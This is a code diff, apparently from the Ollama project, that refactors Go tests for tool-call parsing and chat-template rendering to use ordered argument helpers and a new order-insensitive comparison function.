if len(prop.AnyOf) > 0 {
|
if len(prop.AnyOf) > 0 {
|
||||||
for _, anyOfProp := range prop.AnyOf {
|
for _, anyOfProp := range prop.AnyOf {
|
||||||
|
|
@ -287,7 +287,7 @@ func parseToolCall(raw qwenEventRawToolCall, tools []api.Tool) (api.ToolCall, er
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
toolCall.Function.Arguments[parameter.Name] = parseValue(parameter.Value, paramType)
|
toolCall.Function.Arguments.Set(parameter.Name, parseValue(parameter.Value, paramType))
|
||||||
}
|
}
|
||||||
|
|
||||||
return toolCall, nil
|
return toolCall, nil
|
||||||
|
|
|
||||||
|
|
@ -11,7 +11,7 @@ import (
|
||||||
func tool(name string, props map[string]api.ToolProperty) api.Tool {
|
func tool(name string, props map[string]api.ToolProperty) api.Tool {
|
||||||
t := api.Tool{Type: "function", Function: api.ToolFunction{Name: name}}
|
t := api.Tool{Type: "function", Function: api.ToolFunction{Name: name}}
|
||||||
t.Function.Parameters.Type = "object"
|
t.Function.Parameters.Type = "object"
|
||||||
t.Function.Parameters.Properties = props
|
t.Function.Parameters.Properties = testPropsMap(props)
|
||||||
return t
|
return t
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
@ -369,10 +369,10 @@ celsius
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_current_temperature",
|
Name: "get_current_temperature",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco",
|
"location": "San Francisco",
|
||||||
"unit": "celsius",
|
"unit": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -390,10 +390,10 @@ celsius
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get current temperature",
|
Name: "get current temperature",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location with spaces": "San Francisco",
|
"location with spaces": "San Francisco",
|
||||||
"unit with spaces": "celsius",
|
"unit with spaces": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -415,10 +415,10 @@ San Francisco
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "\"get current temperature\"",
|
Name: "\"get current temperature\"",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"\"location with spaces\"": "San Francisco",
|
"\"location with spaces\"": "San Francisco",
|
||||||
"\"unit with spaces\"": "\"celsius\"",
|
"\"unit with spaces\"": "\"celsius\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -449,12 +449,12 @@ true
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"x": 3.14,
|
"x": 3.14,
|
||||||
"y": 42,
|
"y": 42,
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
"items": []any{"a", "b", "c"},
|
"items": []any{"a", "b", "c"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -470,9 +470,9 @@ ls && echo "done"
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"done\"",
|
"command": "ls && echo \"done\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -487,9 +487,9 @@ ls && echo "a > b and a < b"
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"a > b and a < b\"",
|
"command": "ls && echo \"a > b and a < b\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -507,10 +507,10 @@ Hello! 你好! 🌟 مرحبا
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "获取天气",
|
Name: "获取天气",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"城市": "北京",
|
"城市": "北京",
|
||||||
"message": "Hello! 你好! 🌟 مرحبا",
|
"message": "Hello! 你好! 🌟 مرحبا",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -521,7 +521,7 @@ Hello! 你好! 🌟 مرحبا
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||||
}
|
}
|
||||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -550,10 +550,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get-current-weather",
|
Name: "get-current-weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco, CA",
|
"location": "San Francisco, CA",
|
||||||
"unit": "fahrenheit",
|
"unit": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -564,10 +564,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get current temperature",
|
Name: "get current temperature",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location with spaces": "San Francisco",
|
"location with spaces": "San Francisco",
|
||||||
"unit with spaces": "celsius",
|
"unit with spaces": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -578,10 +578,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "\"get current temperature\"",
|
Name: "\"get current temperature\"",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"\"location with spaces\"": "San Francisco",
|
"\"location with spaces\"": "San Francisco",
|
||||||
"\"unit with spaces\"": "\"celsius\"",
|
"\"unit with spaces\"": "\"celsius\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -592,12 +592,12 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"x": 3.14,
|
"x": 3.14,
|
||||||
"y": float64(42),
|
"y": float64(42),
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
"items": []any{"a", "b", "c"},
|
"items": []any{"a", "b", "c"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -608,9 +608,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"done\"",
|
"command": "ls && echo \"done\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -621,9 +621,9 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"a > b and a < b\"",
|
"command": "ls && echo \"a > b and a < b\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -634,10 +634,10 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "获取天气",
|
Name: "获取天气",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"城市": "北京",
|
"城市": "北京",
|
||||||
"message": "Hello! 你好! 🌟 مرحبا",
|
"message": "Hello! 你好! 🌟 مرحبا",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -648,7 +648,7 @@ func TestQwen3VLNonThinkingToolParser(t *testing.T) {
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||||
}
|
}
|
||||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -241,10 +241,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get-current-weather",
|
Name: "get-current-weather",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "San Francisco, CA",
|
"location": "San Francisco, CA",
|
||||||
"unit": "fahrenheit",
|
"unit": "fahrenheit",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -255,10 +255,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get current temperature",
|
Name: "get current temperature",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"location with spaces": "San Francisco",
|
"location with spaces": "San Francisco",
|
||||||
"unit with spaces": "celsius",
|
"unit with spaces": "celsius",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -269,10 +269,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "\"get current temperature\"",
|
Name: "\"get current temperature\"",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"\"location with spaces\"": "San Francisco",
|
"\"location with spaces\"": "San Francisco",
|
||||||
"\"unit with spaces\"": "\"celsius\"",
|
"\"unit with spaces\"": "\"celsius\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -283,12 +283,12 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "calculate",
|
Name: "calculate",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"x": 3.14,
|
"x": 3.14,
|
||||||
"y": float64(42),
|
"y": float64(42),
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
"items": []any{"a", "b", "c"},
|
"items": []any{"a", "b", "c"},
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -299,9 +299,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"done\"",
|
"command": "ls && echo \"done\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -312,9 +312,9 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "exec",
|
Name: "exec",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"command": "ls && echo \"a > b and a < b\"",
|
"command": "ls && echo \"a > b and a < b\"",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -325,10 +325,10 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
wantToolCall: api.ToolCall{
|
wantToolCall: api.ToolCall{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "获取天气",
|
Name: "获取天气",
|
||||||
Arguments: map[string]any{
|
Arguments: testArgs(map[string]any{
|
||||||
"城市": "北京",
|
"城市": "北京",
|
||||||
"message": "Hello! 你好! 🌟 مرحبا",
|
"message": "Hello! 你好! 🌟 مرحبا",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -339,7 +339,7 @@ func TestQwen3VLThinkingToolParser(t *testing.T) {
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Errorf("step %d (%s): %v", i, step.name, err)
|
t.Errorf("step %d (%s): %v", i, step.name, err)
|
||||||
}
|
}
|
||||||
if !reflect.DeepEqual(gotToolCall, step.wantToolCall) {
|
if !toolCallEqual(gotToolCall, step.wantToolCall) {
|
||||||
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
t.Errorf("step %d (%s): got tool call %#v, want %#v", i, step.name, gotToolCall, step.wantToolCall)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -0,0 +1,98 @@
|
||||||
|
package parsers
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/json"
|
||||||
|
|
||||||
|
"github.com/google/go-cmp/cmp"
|
||||||
|
"github.com/ollama/ollama/api"
|
||||||
|
)
|
||||||
|
|
||||||
|
// argsComparer provides cmp options for comparing ToolCallFunctionArguments
|
||||||
|
// It compares by logical equality (same keys with same values) not by order
|
||||||
|
var argsComparer = cmp.Comparer(func(a, b api.ToolCallFunctionArguments) bool {
|
||||||
|
// Convert both to maps and compare
|
||||||
|
aMap := a.ToMap()
|
||||||
|
bMap := b.ToMap()
|
||||||
|
if len(aMap) != len(bMap) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
for k, av := range aMap {
|
||||||
|
bv, ok := bMap[k]
|
||||||
|
if !ok {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
// Use JSON encoding for deep comparison of values
|
||||||
|
aJSON, _ := json.Marshal(av)
|
||||||
|
bJSON, _ := json.Marshal(bv)
|
||||||
|
if string(aJSON) != string(bJSON) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
})
|
||||||
|
|
||||||
|
// propsComparer provides cmp options for comparing ToolPropertiesMap
|
||||||
|
var propsComparer = cmp.Comparer(func(a, b *api.ToolPropertiesMap) bool {
|
||||||
|
if a == nil && b == nil {
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
if a == nil || b == nil {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
aJSON, _ := json.Marshal(a)
|
||||||
|
bJSON, _ := json.Marshal(b)
|
||||||
|
return string(aJSON) == string(bJSON)
|
||||||
|
})
|
||||||
|
|
||||||
|
// toolsComparer combines argsComparer and propsComparer for comparing tools
|
||||||
|
var toolsComparer = cmp.Options{argsComparer, propsComparer}
|
||||||
|
|
||||||
|
// toolCallEqual compares two tool calls by comparing their components
|
||||||
|
// It compares arguments by logical equality (same keys with same values) not by order
|
||||||
|
func toolCallEqual(a, b api.ToolCall) bool {
|
||||||
|
if a.ID != b.ID {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if a.Function.Index != b.Function.Index {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
if a.Function.Name != b.Function.Name {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
// Compare arguments by logical equality using argsComparer logic
|
||||||
|
aMap := a.Function.Arguments.ToMap()
|
||||||
|
bMap := b.Function.Arguments.ToMap()
|
||||||
|
if len(aMap) != len(bMap) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
for k, av := range aMap {
|
||||||
|
bv, ok := bMap[k]
|
||||||
|
if !ok {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
aJSON, _ := json.Marshal(av)
|
||||||
|
bJSON, _ := json.Marshal(bv)
|
||||||
|
if string(aJSON) != string(bJSON) {
|
||||||
|
return false
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return true
|
||||||
|
}
|
||||||
|
|
||||||
|
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
|
||||||
|
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
|
||||||
|
props := api.NewToolPropertiesMap()
|
||||||
|
for k, v := range m {
|
||||||
|
props.Set(k, v)
|
||||||
|
}
|
||||||
|
return props
|
||||||
|
}
|
||||||
|
|
||||||
|
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
|
||||||
|
func testArgs(m map[string]any) api.ToolCallFunctionArguments {
|
||||||
|
args := api.NewToolCallFunctionArguments()
|
||||||
|
for k, v := range m {
|
||||||
|
args.Set(k, v)
|
||||||
|
}
|
||||||
|
return args
|
||||||
|
}
|
||||||
|
|
@ -94,12 +94,12 @@ You are a helpful assistant.
|
||||||
Description: "Get current weather",
|
Description: "Get current weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -139,9 +139,9 @@ You have the following functions available:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -162,9 +162,9 @@ You have the following functions available:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -186,17 +186,17 @@ You have the following functions available:
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -226,12 +226,12 @@ You have the following functions available:
|
||||||
Description: "Get current weather",
|
Description: "Get current weather",
|
||||||
Parameters: api.ToolFunctionParameters{
|
Parameters: api.ToolFunctionParameters{
|
||||||
Type: "object",
|
Type: "object",
|
||||||
Properties: map[string]api.ToolProperty{
|
Properties: testPropsMap(map[string]api.ToolProperty{
|
||||||
"location": {
|
"location": {
|
||||||
Type: api.PropertyType{"string"},
|
Type: api.PropertyType{"string"},
|
||||||
Description: "City name",
|
Description: "City name",
|
||||||
},
|
},
|
||||||
},
|
}),
|
||||||
Required: []string{"location"},
|
Required: []string{"location"},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -378,9 +378,9 @@ You are a pirate chatbot who always responds in pirate speak!
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -401,14 +401,14 @@ You are a pirate chatbot who always responds in pirate speak!
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process_data",
|
Name: "process_data",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgsOrdered([]orderedArg{
|
||||||
"items": []any{"item1", "item2", "item3"},
|
{"config", map[string]any{
|
||||||
"config": map[string]any{
|
|
||||||
"enabled": true,
|
"enabled": true,
|
||||||
"threshold": 0.95,
|
"threshold": 0.95,
|
||||||
"tags": []string{"important", "urgent"},
|
"tags": []string{"important", "urgent"},
|
||||||
},
|
}},
|
||||||
},
|
{"items", []any{"item1", "item2", "item3"}},
|
||||||
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
|
||||||
|
|
@ -82,9 +82,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -104,9 +104,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -125,9 +125,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -147,17 +147,17 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "London",
|
"location": "London",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -214,9 +214,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -235,9 +235,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "process",
|
Name: "process",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"data": "test",
|
"data": "test",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -281,9 +281,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -305,9 +305,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -355,9 +355,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
Arguments: api.ToolCallFunctionArguments{
|
Arguments: testArgs(map[string]any{
|
||||||
"location": "Paris",
|
"location": "Paris",
|
||||||
},
|
}),
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
},
|
},
|
||||||
|
|
@ -379,9 +379,9 @@ Second instruction<|User|>Hello<|Assistant|></think>`,
|
||||||
{
|
{
|
||||||
Function: api.ToolCallFunction{
|
Function: api.ToolCallFunction{
|
||||||
Name: "get_weather",
|
Name: "get_weather",
|
||||||
